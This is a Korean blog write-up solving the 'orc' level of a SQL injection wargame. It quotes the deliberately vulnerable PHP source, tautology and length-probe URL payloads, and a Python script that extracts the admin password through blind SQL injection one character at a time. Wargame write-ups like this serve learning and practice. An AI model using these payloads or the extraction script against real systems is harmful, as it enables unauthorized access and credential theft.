IT보안관의 공부 클라우드

[los]orc 본문

워게임/los

[los]orc

ㅡㅡㅡㅡㄷ 2021. 3. 25. 22:35 
<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello admin</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc"); 
  highlight_file(__FILE__); 
?>

 

코드를 살펴보면 pw를 알아내서 동일한 pw를 입력해야 문제가 풀리는 코드인걸로 보임.

https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=aaa'or'1'='1

query : select id from prob_orc where id='admin' and pw='aaa'or'1'='1'

질의 시 "Hello admin" 출력

 

https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=aaa'or'1'='0

query : select id from prob_orc where id='admin' and pw='aaa'or'1'='0'

'1' = '0 으로 변경 시 출력 X

Blind SQL 인젝션이 가능할 것으로 보임.

https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=123%27%20or%20id=%27admin%27%20and%20length(pw)=%278

패스워드 길이 구함.

query : select id from prob_orc where id='admin' and pw='123' or id='admin' and length(pw)='8'

 

더보기

https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=123%27%20or%20%271%27=%271%27%20and%20substr(pw,1,1)=%27d

query : select id from prob_orc where id='admin' and pw='123' or '1'='1' and substr(pw,1,1)='0'

이 쿼리는 잘못됨. 조건을 보면 or 좌측 절은 False 반환, or 우측 절은 제일 첫 응답행에 대한 pw를 구함. admin인지 확실치 않음.

Hello admin 출력

substr을 이용하여 pw데이터를 비교연산자로 값을 변경하면서 비교하면 전체 pw 추출 가능

일일히 하기 귀찮으니 python을 이용하여 진행.

pw: djfa9852

 

https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=123%27%20or id='admin' and substr(pw,1,1)='0

query : select id from prob_orc where id='admin' and pw='123' or id='admin' and substr(pw,1,1)='0'

PW: 0

 

BruteForce : 파이썬으로 코드 작성 후 실행

#orc BlindSqlInjection
import requests
#from itertools import product

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*'
pw = str()
url = 'https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
cookies = {'PHPSESSID':'7cu8mcoov0uo0qirli9sk9d38j'}
for i in range(1,9):
    for char in chars:
        param={'pw':"123' or id='admin' and substr(pw,"+str(i)+",1)='"+str(char)}
        res=requests.get(url,cookies=cookies,params=param,verify=False)
        res_text=res.text
        print(res_text)
        if "Hello admin" in res_text:
            pw=pw+str(char)
            print("PW:"+pw)
            break

print("PW:"+pw)
저작자표시 비영리

'워게임 > los' 카테고리의 다른 글

[los]troll  (0) 2021.05.28
[los]orge  (0) 2021.05.25
[los]darkelf  (0) 2021.05.21
[los]wolfman  (0) 2021.05.17
[los]gremlin  (0) 2021.03.23
'워게임/los' Related Articles more
Comments